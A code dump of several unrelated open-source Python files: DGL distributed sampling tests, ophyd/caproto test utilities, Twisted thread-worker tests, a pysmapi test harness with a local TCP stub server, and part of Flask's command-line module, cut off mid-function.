with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
def check_standalone_sampling(tmpdir):
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = 1
num_hops = 1
partition_graph(g, 'test_sampling', num_parts, tmpdir,
num_hops=num_hops, part_method='metis', reshuffle=False)
dist_graph = DistGraph(None, "test_sampling", conf_file=tmpdir / 'test_sampling.json')
sampled_graph = sample_neighbors(dist_graph, [0, 10, 99, 66, 1024, 2008], 3)
src, dst = sampled_graph.edges()
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
assert np.all(F.asnumpy(g.has_edges_between(src, dst)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_standalone_sampling():
import tempfile
os.environ['DGL_DIST_MODE'] = 'standalone'
with tempfile.TemporaryDirectory() as tmpdirname:
check_standalone_sampling(Path(tmpdirname))
def start_in_subgraph_client(rank, tmpdir, disable_shared_mem, nodes):
gpb = None
if disable_shared_mem:
_, _, _, gpb, _ = load_partition(tmpdir / 'test_in_subgraph.json', rank)
dist_graph = DistGraph("rpc_ip_config.txt", "test_in_subgraph", gpb=gpb)
sampled_graph = dgl.distributed.in_subgraph(dist_graph, nodes)
dgl.distributed.exit_client()
return sampled_graph
def check_rpc_in_subgraph(tmpdir, num_server):
ip_config = open("rpc_ip_config.txt", "w")
for _ in range(num_server):
ip_config.write('{} 1\n'.format(get_local_usable_addr()))
ip_config.close()
g = CitationGraphDataset("cora")[0]
g.readonly()
num_parts = num_server
partition_graph(g, 'test_in_subgraph', num_parts, tmpdir,
num_hops=1, part_method='metis', reshuffle=False)
pserver_list = []
ctx = mp.get_context('spawn')
for i in range(num_server):
p = ctx.Process(target=start_server, args=(i, tmpdir, num_server > 1, 'test_in_subgraph'))
p.start()
time.sleep(1)
pserver_list.append(p)
nodes = [0, 10, 99, 66, 1024, 2008]
time.sleep(3)
sampled_graph = start_in_subgraph_client(0, tmpdir, num_server > 1, nodes)
for p in pserver_list:
p.join()
src, dst = sampled_graph.edges()
g = dgl.as_heterograph(g)
assert sampled_graph.number_of_nodes() == g.number_of_nodes()
subg1 = dgl.in_subgraph(g, nodes)
src1, dst1 = subg1.edges()
assert np.all(np.sort(F.asnumpy(src)) == np.sort(F.asnumpy(src1)))
assert np.all(np.sort(F.asnumpy(dst)) == np.sort(F.asnumpy(dst1)))
eids = g.edge_ids(src, dst)
assert np.array_equal(
F.asnumpy(sampled_graph.edata[dgl.EID]), F.asnumpy(eids))
@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@unittest.skipIf(dgl.backend.backend_name == 'tensorflow', reason='Not support tensorflow for now')
def test_rpc_in_subgraph():
import tempfile
os.environ['DGL_DIST_MODE'] = 'distributed'
with tempfile.TemporaryDirectory() as tmpdirname:
check_rpc_in_subgraph(Path(tmpdirname), 2)
if __name__ == "__main__":
import tempfile
with tempfile.TemporaryDirectory() as tmpdirname:
os.environ['DGL_DIST_MODE'] = 'standalone'
check_standalone_sampling(Path(tmpdirname))
os.environ['DGL_DIST_MODE'] = 'distributed'
check_rpc_in_subgraph(Path(tmpdirname), 2)
check_rpc_sampling_shuffle(Path(tmpdirname), 1)
check_rpc_sampling_shuffle(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 2)
check_rpc_sampling(Path(tmpdirname), 1)
|
utils.py
|
"""
Helpful functions that don't belong in a more specific submodule.
"""
import importlib
import logging
import os
import pkgutil
import signal
import uuid
from contextlib import contextmanager
from inspect import isclass, isfunction
from multiprocessing import Process
from ophyd.signal import EpicsSignalBase
logger = logging.getLogger(__name__)
_optional_err = ('Optional dependency caproto missing from python '
'environment. Cannot test server.')
try:
from caproto.server import PVGroup, pvproperty, run
has_caproto = True
except ImportError:
has_caproto = False
logger.debug(_optional_err)
def run_caproto_ioc(device_class, prefix):
"""
Runs a dummy caproto IOC.
Includes all the PVs that device_class will have if instantiated with
prefix.
Assumes only basic :class:`ophyd.Component` instances in the class
definition.
"""
if not has_caproto:
raise ImportError(_optional_err)
pvprops = {}
for suffix in yield_all_suffixes(device_class):
pvprops[suffix] = pvproperty()
DynIOC = type('DynIOC', (PVGroup,), pvprops)
ioc = DynIOC(prefix)
run(ioc.pvdb, module_name='caproto.asyncio.server',
interfaces=['0.0.0.0'])
def yield_all_suffixes(device_class):
"""
Iterates through all full pvname suffixes defined by device_class.
Assumes only basic :class:`ophyd.Component` instances in the class
definition.
"""
for walk in device_class.walk_components():
if issubclass(walk.item.cls, EpicsSignalBase):
suffix = get_suffix(walk)
yield suffix
def get_suffix(walk):
"""
Returns the full pvname suffix from a ComponentWalk instance.
This means everything after the top-level device's prefix.
Assumes that walk is an :class:`ophyd.signal.EpicsSignalBase`
subclass and that it was defined using only
:class:`ophyd.Component` in the device ancestors tree.
"""
suffix = ''
for cls, attr in zip(walk.ancestors, walk.dotted_name.split('.')):
suffix += getattr(cls, attr).suffix
return suffix
@contextmanager
def caproto_context(device_class, prefix):
"""
Yields a caproto process with all elements of the input device.
The caproto IOC will be run in a background process, making it suitable for
testing devices in the main process.
"""
if not has_caproto:
raise ImportError(_optional_err)
proc = Process(target=run_caproto_ioc, args=(device_class, prefix))
proc.start()
yield
if proc.is_alive():
os.kill(proc.pid, signal.SIGKILL)
def random_prefix():
"""Returns a random prefix to avoid test cross-talk."""
return str(uuid.uuid4())[:8] + ':'
def is_native(obj, module):
"""
Determines if obj was defined in module.
Returns True if obj was defined in this module.
Returns False if obj was not defined in this module.
Returns None if we can't figure it out, e.g. if this is a primitive type.
"""
try:
return module.__name__ in obj.__module__
except (AttributeError, TypeError):
return None
def get_native_functions(module):
"""Returns a set of all functions and methods defined in module."""
return get_native_methods(module, module)
def get_native_methods(cls, module, *, native_methods=None, seen=None):
"""Returns a set of all methods defined in cls that belong to module."""
if native_methods is None:
native_methods = set()
if seen is None:
seen = set()
for obj in cls.__dict__.values():
try:
if obj in seen:
continue
except TypeError:
# Unhashable type, definitely not a class or function
continue
seen.add(obj)
if not is_native(obj, module):
continue
elif isclass(obj):
get_native_methods(obj, module, native_methods=native_methods,
seen=seen)
elif isfunction(obj):
native_methods.add(obj)
return native_methods
def get_submodules(module_name):
"""Returns a list of the imported module plus all submodules."""
submodule_names = get_submodule_names(module_name)
return import_modules(submodule_names)
def get_submodule_names(module_name):
"""
Returns a list of the module name plus all importable submodule names.
"""
module = importlib.import_module(module_name)
submodule_names = [module_name]
try:
module_path = module.__path__
except AttributeError:
# This attr is missing if there are no submodules
return submodule_names
for _, submodule_name, is_pkg in pkgutil.walk_packages(module_path):
if submodule_name != '__main__':
full_submodule_name = module_name + '.' + submodule_name
submodule_names.append(full_submodule_name)
if is_pkg:
subsubmodule_names = get_submodule_names(full_submodule_name)
submodule_names.extend(subsubmodule_names)
return submodule_names
def import_modules(modules):
"""
Utility function to import an iterator of module names as a list.
Skips over modules that are not importable.
"""
module_objects = []
for module_name in modules:
try:
module_objects.append(importlib.import_module(module_name))
except ImportError:
pass
return module_objects
|
test_threadworker.py
|
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted._threads._threadworker}.
"""
import gc
import weakref
from twisted.trial.unittest import SynchronousTestCase
from threading import ThreadError, local
from .. import ThreadWorker, LockWorker, AlreadyQuit
class FakeQueueEmpty(Exception):
"""
L{FakeQueue}'s C{get} has exhausted the queue.
"""
class WouldDeadlock(Exception):
"""
If this were a real lock, you'd be deadlocked because the lock would be
double-acquired.
"""
class FakeThread:
"""
A fake L{threading.Thread}.
@ivar target: A target function to run.
@type target: L{callable}
@ivar started: Has this thread been started?
@type started: L{bool}
"""
def __init__(self, target):
"""
Create a L{FakeThread} with a target.
"""
self.target = target
self.started = False
def start(self):
"""
Set the "started" flag.
"""
self.started = True
class FakeQueue:
"""
A fake L{Queue} implementing C{put} and C{get}.
@ivar items: A lit of items placed by C{put} but not yet retrieved by
C{get}.
@type items: L{list}
"""
def __init__(self):
"""
Create a L{FakeQueue}.
"""
self.items = []
def put(self, item):
"""
Put an item into the queue for later retrieval by L{FakeQueue.get}.
@param item: any object
"""
self.items.append(item)
def get(self):
"""
Get an item.
@return: an item previously put by C{put}.
"""
if not self.items:
raise FakeQueueEmpty()
return self.items.pop(0)
class FakeLock:
"""
A stand-in for L{threading.Lock}.
@ivar acquired: Whether this lock is presently acquired.
"""
def __init__(self):
"""
Create a lock in the un-acquired state.
"""
self.acquired = False
def acquire(self):
"""
Acquire the lock. Raise an exception if the lock is already acquired.
"""
if self.acquired:
raise WouldDeadlock()
self.acquired = True
def release(self):
"""
Release the lock. Raise an exception if the lock is not presently
acquired.
"""
if not self.acquired:
raise ThreadError()
self.acquired = False
class ThreadWorkerTests(SynchronousTestCase):
"""
Tests for L{ThreadWorker}.
"""
def setUp(self):
"""
Create a worker with fake threads.
"""
self.fakeThreads = []
self.fakeQueue = FakeQueue()
def startThread(target):
newThread = FakeThread(target=target)
newThread.start()
self.fakeThreads.append(newThread)
return newThread
self.worker = ThreadWorker(startThread, self.fakeQueue)
def test_startsThreadAndPerformsWork(self):
"""
L{ThreadWorker} calls its C{createThread} callable to create a thread,
its C{createQueue} callable to create a queue, and then the thread's
target pulls work from that queue.
"""
self.assertEqual(len(self.fakeThreads), 1)
self.assertEqual(self.fakeThreads[0].started, True)
def doIt():
doIt.done = True
doIt.done = False
self.worker.do(doIt)
self.assertEqual(doIt.done, False)
self.assertRaises(FakeQueueEmpty, self.fakeThreads[0].target)
self.assertEqual(doIt.done, True)
def test_quitPreventsFutureCalls(self):
"""
L{ThreadWorker.quit} causes future calls to L{ThreadWorker.do} and
L{ThreadWorker.quit} to raise L{AlreadyQuit}.
"""
self.worker.quit()
self.assertRaises(AlreadyQuit, self.worker.quit)
self.assertRaises(AlreadyQuit, self.worker.do, list)
class LockWorkerTests(SynchronousTestCase):
"""
Tests for L{LockWorker}.
"""
def test_fakeDeadlock(self):
"""
The L{FakeLock} test fixture will alert us if there's a potential
deadlock.
"""
lock = FakeLock()
lock.acquire()
self.assertRaises(WouldDeadlock, lock.acquire)
def test_fakeDoubleRelease(self):
"""
The L{FakeLock} test fixture will alert us if there's a potential
double-release.
"""
lock = FakeLock()
self.assertRaises(ThreadError, lock.release)
lock.acquire()
self.assertEqual(None, lock.release())
self.assertRaises(ThreadError, lock.release)
def test_doExecutesImmediatelyWithLock(self):
"""
L{LockWorker.do} immediately performs the work it's given, while the
lock is acquired.
"""
storage = local()
lock = FakeLock()
worker = LockWorker(lock, storage)
def work():
work.done = True
work.acquired = lock.acquired
work.done = False
worker.do(work)
self.assertEqual(work.done, True)
self.assertEqual(work.acquired, True)
self.assertEqual(lock.acquired, False)
def test_doUnwindsReentrancy(self):
"""
If L{LockWorker.do} is called recursively, it postpones the inner call
until the outer one is complete.
"""
lock = FakeLock()
worker = LockWorker(lock, local())
levels = []
acquired = []
def work():
work.level += 1
levels.append(work.level)
acquired.append(lock.acquired)
if len(levels) < 2:
worker.do(work)
work.level -= 1
work.level = 0
worker.do(work)
self.assertEqual(levels, [1, 1])
self.assertEqual(acquired, [True, True])
def test_quit(self):
"""
L{LockWorker.quit} frees the resources associated with its lock and
causes further calls to C{do} and C{quit} to fail.
"""
lock = FakeLock()
ref = weakref.ref(lock)
worker = LockWorker(lock, local())
lock = None
self.assertIsNot(ref(), None)
worker.quit()
gc.collect()
self.assertIs(ref(), None)
self.assertRaises(AlreadyQuit, worker.quit)
self.assertRaises(AlreadyQuit, worker.do, list)
def test_quitWhileWorking(self):
"""
If L{LockWorker.quit} is invoked during a call to L{LockWorker.do}, all
recursive work scheduled with L{LockWorker.do} will be completed and
the lock will be released.
"""
lock = FakeLock()
ref = weakref.ref(lock)
worker = LockWorker(lock, local())
def phase1():
worker.do(phase2)
worker.quit()
self.assertRaises(AlreadyQuit, worker.do, list)
phase1.complete = True
phase1.complete = False
def phase2():
phase2.complete = True
phase2.acquired = lock.acquired
phase2.complete = False
worker.do(phase1)
self.assertEqual(phase1.complete, True)
self.assertEqual(phase2.complete, True)
self.assertEqual(lock.acquired, False)
lock = None
gc.collect()
self.assertIs(ref(), None)
def test_quitWhileGettingLock(self):
"""
If L{LockWorker.do} is called concurrently with L{LockWorker.quit}, and
C{quit} wins the race before C{do} gets the lock attribute, then
L{AlreadyQuit} will be raised.
"""
class RacyLockWorker(LockWorker):
@property
def _lock(self):
self.quit()
return self.__dict__["_lock"]
@_lock.setter
def _lock(self, value):
self.__dict__["_lock"] = value
worker = RacyLockWorker(FakeLock(), local())
self.assertRaises(AlreadyQuit, worker.do, list)
|
tester.py
|
#!/usr/bin/python3
# Copyright 2018-2019 Leland Lucius
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http:#www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import fnmatch
import json
import os
import sys
import hexdump
import jsonpickle
import select
import socket
import socketserver
import threading
import traceback
from difflib import unified_diff as unified
import pysmapi as smapi
true = True
false = False
null = None
testhome = "tests"
conn = None
server_thread = None
server = None
ip = None
port = None
request = None
response = None
def set_hostinfo(hinfo):
global conn
conn = hinfo
def gentest(api, testname, expect=[(0,0)], **kwargs):
global testhome, conn
smapi.set_test(True)
if testname:
print(f"##### Generating {api} test: {testname}")
else:
print(f"##### Executing {api}")
# Get a reference to the target class
cls = getattr(globals()["smapi"], api)
# Create instance using keywords
try:
req1 = cls(**kwargs)
except Exception as e:
print(f"Creation using keywords failed: {e}")
traceback.print_exc()
quit()
# Create instance using setattr
try:
req2 = cls()
except Exception as e:
print(f"Creation using setattr failed: {e}")
traceback.print_exc()
quit()
# and set its attributes
try:
for key, val in kwargs.items():
setattr(req2, key, val)
if getattr(req1, key) != getattr(req2, key):
print(f"mismatch for: {key}")
print(f" keyword: {getattr(req1, key)}")
print(f" setattr: {getattr(req2, key)}")
quit()
except Exception as e:
print(f"setting attribute {key} failed: {e}")
traceback.print_exc()
quit()
# Convert the requests to json
res1 = json.dumps(json.loads(jsonpickle.encode(req1, unpicklable=False)), indent=1)
res2 = json.dumps(json.loads(jsonpickle.encode(req2, unpicklable=False)), indent=1)
# Compare the requests to ensure they were created the same
diff = "\n".join(unified(res1.split("\n"), res2.split("\n"), lineterm=""))
if len(diff) > 0:
print(f"Creation different between keyword and setattr methods")
print(diff)
quit()
# Execute request
try:
req1.request(conn)
except Exception as e:
print(f"Executing keyword method failed: {e}")
traceback.print_exc()
quit()
# Tell somebody that the test MAY not have ended properly
if (-1, -1) not in expect and \
(req1._return_code, -1) not in expect and \
(-1, req1._reason_code) not in expect and \
(req1._return_code, req1._reason_code) not in expect:
print(f"##### WARNING: rc={req1._return_code} rs={req1._reason_code}")
# Convert the post execution request to json
res = json.dumps(json.loads(jsonpickle.encode(req1, unpicklable=False)), indent=1)
# Save the results if a testname was provided
if testname:
# Generate the path and create the directories if needed
path = os.path.join(testhome, api)
if not os.path.exists(path):
os.makedirs(path)
path = os.path.join(path, testname + ".test")
# And finally write out the testcase
with open(path, "w") as f:
f.write(f"api = '{api}'\n")
f.write(f"kwargs = {kwargs}\n")
f.write(f"result = \\\n{res}\n")
return req1
class TestServer(socketserver.BaseRequestHandler):
def handle(self):
global request, response
# Receive the request
try:
received = self.recv(len(request))
#print("Received:")
#print(hexdump.hexdump(received, result="return"))
if received != request:
print("Received request doesn't match expected")
print("Expected:")
print(hexdump.hexdump(request, result="return"))
print
print("Received:")
print(hexdump.hexdump(received, result="return"))
return
except Exception as e:
traceback.print_exc()
return
# Make sure there's no more after the request
try:
received = self.recv(1)
print("Unexpected data received after request")
return True
except IOError as e:
if e.errno != errno.ETIMEDOUT:
traceback.print_exc()
return
# Send the response
self.request.sendall(response)
def recv(self, length, timeout=1):
buf = b""
while length > 0:
rlist, _, _ = select.select([self.request], [], [], timeout)
if len(rlist) == 0:
raise IOError(errno.ETIMEDOUT, f"Timed out waiting to receive {length} bytes")
read = self.request.recv(length)
if len(read) == 0:
raise IOError(errno.ENOTCONN, "Connection closed by remote")
buf += read
length -= len(read)
return buf
def start_server():
global server_thread, server, ip, port
server = socketserver.TCPServer(("localhost", 0), TestServer)
ip, port = server.server_address
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
set_hostinfo(smapi.HostInfo(host=ip,
port=port,
ssl=False,
userid="maint",
password="maint",
timeout=600))
def runtest(path):
global request, response
smapi.set_test(True)
# Extract the test name
testname = os.path.splitext(os.path.basename(path))[0]
# Pull in the test
testvars = {}
exec(open(path).read(), globals(), testvars)
# Copy in the variables
api = testvars["api"]
kwargs = testvars["kwargs"]
result = jsonpickle.decode(json.dumps(testvars["result"]))
print(f"##### Running {api} test: {testname}")
# Extract the original request and response
request = result["_send"]
response = result["_recv"]
# Get a reference to the target class
cls = getattr(globals()["smapi"], api)
# Create instance using keywords
try:
req1 = cls(**kwargs)
except Exception as e:
print(f"Creation using keywords failed: {e}")
traceback.print_exc()
quit()
# Create instance using setattr
try:
req2 = cls()
except Exception as e:
print(f"Creation using setattr failed: {e}")
traceback.print_exc()
quit()
# And set its attributes
try:
for key, val in kwargs.items():
setattr(req2, key, val)
if getattr(req1, key) != getattr(req2, key):
print(f"Mismatch for: {key}")
print(f" keyword: {getattr(req1, key)}")
print(f" setattr: {getattr(req2, key)}")
quit()
except Exception as e:
print(f"Setting attributes failed: {e}")
traceback.print_exc()
quit()
# Convert the requests to json
res1 = json.dumps(json.loads(jsonpickle.encode(req1, unpicklable=False)), indent=1)
res2 = json.dumps(json.loads(jsonpickle.encode(req2, unpicklable=False)), indent=1)
# Compare the requests to ensure they were created the same
diff = "\n".join(unified(res1.split("\n"), res2.split("\n"), lineterm=""))
if len(diff) > 0:
print(f"Creation different between keyword and setattr methods")
print(diff)
quit()
# Execute request
try:
req1.request(conn)
except Exception as e:
print(f"Test execution failed:: {e}")
traceback.print_exc()
quit()
# Convert the post execution request to json
res1 = json.dumps(json.loads(jsonpickle.encode(req1, unpicklable=False)), indent=1)
# Convert the captured result to json
res2 = json.dumps(json.loads(jsonpickle.encode(result, unpicklable=False)), indent=1)
# Compare the results to ensure they match
diff = "\n".join(unified(res1.split("\n"), res2.split("\n"), lineterm=""))
if len(diff) > 0:
print(f"Results different between keyword and setattr methods")
print(diff)
quit()
|
cli.py
|
import ast
import inspect
import os
import platform
import re
import sys
import traceback
from functools import update_wrapper
from operator import attrgetter
from threading import Lock
from threading import Thread
import click
from werkzeug.utils import import_string
from .globals import current_app
from .helpers import get_debug_flag
from .helpers import get_env
from .helpers import get_load_dotenv
try:
import dotenv
except ImportError:
dotenv = None
try:
import ssl
except ImportError:
ssl = None # type: ignore
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in ("app", "application"):
app = getattr(module, attr_name, None)
if isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for v in module.__dict__.values() if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
elif len(matches) > 1:
raise NoAppException(
"Detected multiple Flask applications in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
f" to specify the correct one."
)
# Search for app factory functions.
for attr_name in ("create_app", "make_app"):
app_factory = getattr(module, attr_name, None)
if inspect.isfunction(app_factory):
try:
app = app_factory()
if isinstance(app, Flask):
return app
except TypeError as e:
if not _called_with_wrong_args(app_factory):
raise
raise NoAppException(
f"Detected factory {attr_name!r} in module {module.__name__!r},"
" but could not call it without arguments. Use"
f" \"FLASK_APP='{module.__name__}:{attr_name}(args)'\""
" to specify arguments."
) from e
raise NoAppException(
"Failed to find Flask application or factory in module"
f" {module.__name__!r}. Use 'FLASK_APP={module.__name__}:name'"
" to specify one."
)
def _called_with_wrong_args(f):
"""Check whether calling a function raised a ``TypeError`` because
the call failed or because something in the factory raised the
error.
:param f: The function that was called.
:return: ``True`` if the call failed.
"""
tb = sys.exc_info()[2]
try:
while tb is not None:
if tb.tb_frame.f_code is f.__code__:
# In the function, it was called successfully.
return False
tb = tb.tb_next
# Didn't reach the function.
return True
finally:
# Delete tb to break a circular reference.
# https://docs.python.org/2/library/sys.html#sys.exc_info
del tb
def find_app_by_string(module, app_name):
"""Check if the given string is a variable name or a function. Call
a function to get the app instance, or return the variable directly.
"""
from . import Flask
# Parse app_name as a single expression to determine if it's a valid
# attribute name or function call.
try:
expr = ast.parse(app_name.strip(), mode="eval").body
except SyntaxError:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
) from None
if isinstance(expr, ast.Name):
name = expr.id
args = []
kwargs = {}
elif isinstance(expr, ast.Call):
# Ensure the function name is an attribute name only.
if not isinstance(expr.func, ast.Name):
raise NoAppException(
f"Function reference must be a simple name: {app_name!r}."
)
name = expr.func.id
# Parse the positional and keyword arguments as literals.
try:
args = [ast.literal_eval(arg) for arg in expr.args]
kwargs = {kw.arg: ast.literal_eval(kw.value) for kw in expr.keywords}
except ValueError:
# literal_eval gives cryptic error messages, show a generic
# message with the full expression instead.
raise NoAppException(
f"Failed to parse arguments as literal values: {app_name!r}."
) from None
else:
raise NoAppException(
f"Failed to parse {app_name!r} as an attribute name or function call."
)
try:
attr = getattr(module, name)
except AttributeError as e:
raise NoAppException(
f"Failed to find attribute {name!r} in {module.__name__!r}."
) from e
# If the attribute is a function, call it with any args and kwargs
# to get the real application.
if inspect.isfunction(attr):
try:
app = attr(*args, **kwargs)
except TypeError as e:
if not _called_with_wrong_args(attr):
raise
raise NoAppException(
f"The factory {app_name!r} in module"
f" {module.__name__!r} could not be called with the"
" specified arguments."
) from e
else:
app = attr
if isinstance(app, Flask):
return app
raise NoAppException(
"A valid Flask application was not obtained from"
f" '{module.__name__}:{app_name}'."
)
def prepare_import(path):
"""Given a filename this will try to calculate the python path, add it
to the search path and return the actual module name that is expected.
"""
path = os.path.realpath(path)
fname, ext = os.path.splitext(path)
if ext == ".py":
path = fname
if os.path.basename(path) == "__init__":
path = os.path.dirname(path)
module_name = []
# move up until outside package structure (no __init__.py)
while True:
path, name = os.path.split(path)
module_name.append(name)
if not os.path.exists(os.path.join(path, "__init__.py")):
break
if sys.path[0] != path:
sys.path.insert(0, path)
return ".".join(module_name[::-1])
def locate_app(module_name, app_name, raise_if_not_found=True):
__traceback_hide__ = True # noqa: F841
try:
__import__(module_name)
except ImportError as e:
# Reraise the ImportError if it occurred within the imported module.
# Determine this by checking whether the trace has a depth > 1.
if sys.exc_info()[2].tb_next:
raise NoAppException(
f"While importing {module_name!r}, an ImportError was raised."
) from e
elif raise_if_not_found:
raise NoAppException(f"Could not import {module_name!r}.") from e
else:
return
module = sys.modules[module_name]
if app_name is None:
return find_best_app(module)
else:
return find_app_by_string(module, app_name)
def get_version(ctx, param, value):
if not value or ctx.resilient_parsing:
return
import werkzeug
from . import __version__
click.echo(
f"Python {platform.python_version()}\n"
f"Flask {__version__}\n"
f"Werkzeug {werkzeug.__version__}",
color=ctx.color,
)
ctx.exit()
version_option = click.Option(
["--version"],
help="Show the flask version",
expose_value=False,
callback=get_version,
is_flag=True,
is_eager=True,
)
class DispatchingApp:
"""Special application that dispatches to a Flask application which
is imported by name in a background thread. If an error happens
it is recorded and shown as part of the WSGI handling which in case
of the Werkzeug debugger means that it shows up in the browser.
"""
def __init__(self, loader, use_eager_loading=None):
self.loader = loader
self._app = None
self._lock = Lock()
self._bg_loading_exc = None
if use_eager_loading is None:
use_eager_loading = os.environ.get("WERKZEUG_RUN_MAIN") != "true"
if use_eager_loading:
self._load_unlocked()
else:
self._load_in_background()
def _load_in_background(self):
def _load_app():
__traceback_hide__ = True # noqa: F841
with self._lock:
try:
self._load_unlocked()
except Exception as e:
self._bg_loading_exc = e
t = Thread(target=_load_app, args=())
t.start()
def _flush_bg_loading_exception(self):
__traceback_hide__ = True # noqa: F841
exc = self._bg_loading_exc
if exc is not None:
self._bg_loading_exc = None
raise exc
def _load_unlocked(self):
__traceback_hide__ = True # noqa: F841
self._app = rv = self.loader()
self._bg_loading_exc = None
return rv
def __call__(self, environ, start_response):
__traceback_hide__ = True # noqa: F841
if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo:
"""Helper object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None, set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True # noqa: F841
if self._loaded_app is not None:
return self._loaded_app
if self.create_app is not None:
app = self.create_app()
else:
if self.app_import_path:
path, name = (
re.split(r":(?![\\/])", self.app_import_path, 1) + [None]
)[:2]
import_name = prepare_import(path)
app = locate_app(import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(import_name, None, raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
"Could not locate a Flask application. You did not provide "
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault("cls", AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this. see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(
self,
add_default_commands=True,
create_app=None,
add_version_option=True,
load_dotenv=True,
set_debug_flag=True,
**extra,
):
params = list(extra.pop("params", None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points("flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# Look up built-in and plugin commands, which should be
# available even if the app fails to load.
rv = super().get_command(ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
# Look up commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
return info.load_app().cli.get_command(ctx, name)
except NoAppException as e:
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
def list_commands(self, ctx):
self._load_plugin_commands()
# Start with the built-in and plugin commands.
rv = set(super().list_commands(ctx))
info = ctx.ensure_object(ScriptInfo)
# Add commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
rv.update(info.load_app().cli.list_commands(ctx))
except NoAppException as e:
# When an app couldn't be loaded, show the error message
# without the traceback.
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
except Exception:
# When any other errors occurred during loading, show the
# full traceback.
